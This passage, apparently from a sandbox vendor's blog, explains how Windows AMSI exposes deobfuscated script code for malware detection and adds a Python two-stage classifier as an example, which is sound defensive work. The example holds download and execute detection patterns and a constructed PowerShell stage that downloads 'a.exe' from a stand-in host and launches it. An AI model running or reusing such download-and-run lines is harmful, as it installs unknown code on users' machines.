We therefore thought there must be a better way. Enter the Microsoft Antimalware Scan Interface (AMSI).
AMSI in a Nutshell
AMSI is a generic interface standard that allows applications and services to integrate with any anti-malware product present on a machine. In effect, it lets you hook into a Windows interface that is also used by Windows Defender. Here is an image from the Microsoft Cloud Blog outlining how AMSI works with Microsoft Office.
Behavior logs are mostly string buffers of executed code. In addition to Microsoft Office, AMSI also provides buffers for
- Wscript.exe, VBA Code
- Powershell.exe, PS1 Code
Here is another one:
AMSI does not care about packing, unpacking or obfuscation: it sends all executed code as strings to the interface. As a result, AMSI is the perfect unpacker and deobfuscator. Malware cannot use AMSI as an indicator for evasion, since AMSI runs on real targets as part of Windows Defender. Approaches to disable or evade AMSI can be detected and serve as an additional malicious indicator.
If we find one or a combination of such strings, the sample is considered malicious. If we do not find such strings, we check each AMSI buffer for the strings. Please note that AMSI sends all code, including the code passed to the eval function. If we find a string there, we know for sure that the sample is malicious as well as packed. If we do not find any string, the sample is considered clean.
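The two-stage check described above, written out as an added example (not Joe Sandbox's own code). It assumes a small, constructed set of indicator patterns and a constructed sample: a script whose static text only contains an encoded second stage, plus the AMSI buffers that would be observed when it runs, where the decoded stage shows up because AMSI also receives code passed to eval-style functions. The pattern list, the `classify` function and the sample data are all assumptions made for illustration.

```python
import re
from dataclasses import dataclass, field

# Indicator patterns a sandbox might look for in script code.
# Constructed for this example; a real rule set would be much larger.
INDICATORS = {
    "download": re.compile(r"(?i)\b(DownloadFile|DownloadString|XMLHTTP|Invoke-WebRequest)\b"),
    "execute": re.compile(r"(?i)\b(Start-Process|WScript\.Shell|ShellExecute|Invoke-Expression|IEX)\b"),
}


@dataclass
class Verdict:
    malicious: bool
    packed: bool
    # indicator name -> where it was first seen ("sample" or "amsi_buffer[i]")
    matched: dict = field(default_factory=dict)


def find_indicators(text):
    """Return the names of all indicator patterns that match the given code string."""
    return {name for name, rx in INDICATORS.items() if rx.search(text)}


def classify(sample_text, amsi_buffers):
    """Stage 1: scan the static sample. Stage 2: scan every AMSI buffer.

    A hit in stage 1 means malicious; a hit only in stage 2 means malicious
    and packed (the indicator was hidden until the code was executed).
    Any single indicator counts as a hit here (assumption for this example).
    """
    hits = find_indicators(sample_text)
    if hits:
        return Verdict(True, False, {h: "sample" for h in sorted(hits)})

    matched = {}
    for i, buf in enumerate(amsi_buffers):
        for h in sorted(find_indicators(buf)):
            matched.setdefault(h, f"amsi_buffer[{i}]")
    if matched:
        return Verdict(True, True, matched)
    return Verdict(False, False)


# Constructed sample: the on-disk script only carries an encoded second stage,
# so none of the indicator words appear in its static text.
SAMPLE_STATIC = """
$b = '<base64 of stage 2, constructed placeholder>'
$d = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($b))
& ([ScriptBlock]::Create($d))
"""

# Constructed AMSI buffers: buffer 0 is the outer script as PowerShell executed it,
# buffer 1 is the decoded stage that AMSI received when ScriptBlock::Create ran it.
SAMPLE_AMSI_BUFFERS = [
    SAMPLE_STATIC,
    "$u = 'http://example.invalid/a.exe'; $p = Join-Path $env:TEMP 'a.exe'; "
    "(New-Object Net.WebClient).DownloadFile($u, $p); Start-Process $p",
]


if __name__ == "__main__":
    v = classify(SAMPLE_STATIC, SAMPLE_AMSI_BUFFERS)
    print(f"malicious={v.malicious} packed={v.packed} matched={v.matched}")
```

Running the block on the constructed sample yields a malicious, packed verdict with both indicators attributed to `amsi_buffer[1]`; a benign `Write-Host` script passes both stages as clean.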
Joe Sandbox has detected the unpacking and displays the full unpacked code. Here the function of the script is to download a binary and then execute it.
You can find the full analysis report here.